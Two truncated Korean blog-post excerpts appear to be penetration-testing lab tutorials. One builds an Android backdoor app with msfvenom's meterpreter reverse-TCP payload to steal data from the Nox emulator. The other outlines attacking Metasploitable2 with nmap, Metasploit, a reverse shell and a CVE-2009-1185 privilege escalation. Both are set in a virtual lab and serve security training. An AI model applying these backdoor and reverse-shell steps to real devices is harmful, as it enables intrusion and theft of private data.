안녕하세요! 오늘은 kali Linux에 있는 metasploit 툴의 하나인 msfvenom을 통해서 백도어를 만든후 nox 프로그램에 잠입하여 민감한 정보를 탈취하는 것을 목표로 하는 포스팅입니다. ※ 해당 실습은 가상머신으로 이루어진 글입니다. 실제 외부 네트워크에서 진행할 시 불법이므로 모든 책임은 본인에게 있습니다. 우선 준비물은 아래와 같습니다.Kali LinuxNox 앱플레이어1. 우선 칼리리눅스를 실행합니다. 2. 명령어창의 ifconfig 명령어를 입력하여 Kali의 IP Address 를 확인합니다. 3. 이후 아래의 명령어를 사용하여 백도어 앱을 만들어줍니다. 사용된 명령어는 아래와 같습니다.명령어 : msfvenom -p android/meterpreter/reverse_Tcp LH..

오늘은 칼리리눅스에 내장된 메타스플로잇(Metasploit)이라는 툴을 이용하여 메타스플로잇터블 2(Metasploitable) 서버를 침투하는 과정을 실습해 볼 것입니다.  공격자 서버: kali linux타겟 서버: metasploitable2실습 전 준비물: metasploit , nmap        ※ 공격시나리오정보수집 (nmap 사용)침투 (metasploit 사용)권한획득 (리버스 쉘 이용)권한상승 (CVE-2009-1185 취약점 관련 내용 사용)- 우선 Metaexploitable2 가 없으신 분들은 아래 페이지에서 다운로드하신 후 VMware에 추가해 주세요. https://sourceforge.net/projects/metasploitable/files/Metasploitable2/..